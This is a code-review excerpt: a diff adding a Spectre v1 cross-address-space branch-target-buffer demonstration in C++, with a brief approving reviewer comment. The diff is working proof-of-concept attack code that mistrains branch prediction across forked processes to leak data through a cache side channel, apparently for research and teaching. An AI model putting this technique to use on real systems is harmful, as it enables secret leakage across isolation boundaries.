demos/spectre_v1_btb_ca.cc

```diff
@@ -0,0 +1,199 @@
+    }
+
+    // Setup all pointers to use public_data_accessor on the victim and
+    // private_data_accessor on the attacker.
+    for (auto &pointer : *array_of_pointers) {
+      // This is a branchless equivalent of:
+      // pointer = pid == 0 : private_data_accessor.get()
+      //                    ? public_data_accesor.get();
+      // Parent (victim) uses public_data_accessor, child (attacker) uses
+      // private_data_accessor.
+      pointer = private_data_accessor.get() + static_cast<bool>(pid) * (
+          public_data_accessor.get() - private_data_accessor.get());
+    }
+
+    for (size_t i = 0; i < kAccessorArrayLength; ++i) {
+      DataAccessor *accessor = (*array_of_pointers)[i];
+
+      // We make sure to flush whole accessor object in case it is
+      // hypothetically on multiple cache-lines.
+      const char *accessor_bytes = reinterpret_cast<const char*>(accessor);
+
+      for (size_t j = 0; j < sizeof(PublicDataAccessor); j += kCacheLineSize) {
+        CLFlush(accessor_bytes + j);
+      }
+
+      // Speculative fetch at the offset. Architecturally the victim fetches
+      // always from the public_data, though speculatively it fetches the
+      // private_data when it is mistrained.
+      ForceRead(isolated_oracle.data() + static_cast<size_t>(
+            accessor->GetDataByte(offset)));
+    }
+
+    // Only the parent (victim) computes results.
+    if (pid != 0) {
+      std::pair<bool, char> result =
+          sidechannel.RecomputeScores(public_data[offset]);
+      if (result.first) {
+        return result.second;
+      }
+
+      if (run > 100000) {
+        std::cerr << "Does not converge " << result.second << std::endl;
+        exit(EXIT_FAILURE);
+      }
+    }
+
+    // If the parent pid changed, the original parent is dead and the child
+    // should terminate too.
+    if (pid == 0 && getppid() != ppid) {
+      exit(EXIT_SUCCESS);
+    }
+
+    // Let the other process run to increase the interference.
+    sched_yield();
+  }
+}
+
+void ChildProcess() {
+  // Infinitely interfere with the critical branching. Results are not
+  // interesting.
+  LeakByte(0);
+}
+
+void ParentProcess() {
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  for (size_t i = 0; i < strlen(public_data); ++i) {
+    std::cout << LeakByte(i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}
+
+int main() {
+  // We need both processes to run on the same core. Pinning the parent before
+  // the fork to the first core. The child inherits the settings.
+  cpu_set_t set;
+  CPU_ZERO(&set);
+  CPU_SET(0, &set);
+  int res = sched_setaffinity(getpid(), sizeof(set), &set);
+  if (res != 0) {
+    std::cout << "CPU affinity setup failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  // Record the parent pid for the death check in the child. When the parent pid
+  // changes for the child, it means that the child should terminate.
+  ppid = getpid();
+
+  pid = fork();
```

Comment:
Using `fork()` so the address spaces are identical and the branches hit the same BTB bucket is pretty nice.

Reply:
OK. Thanks.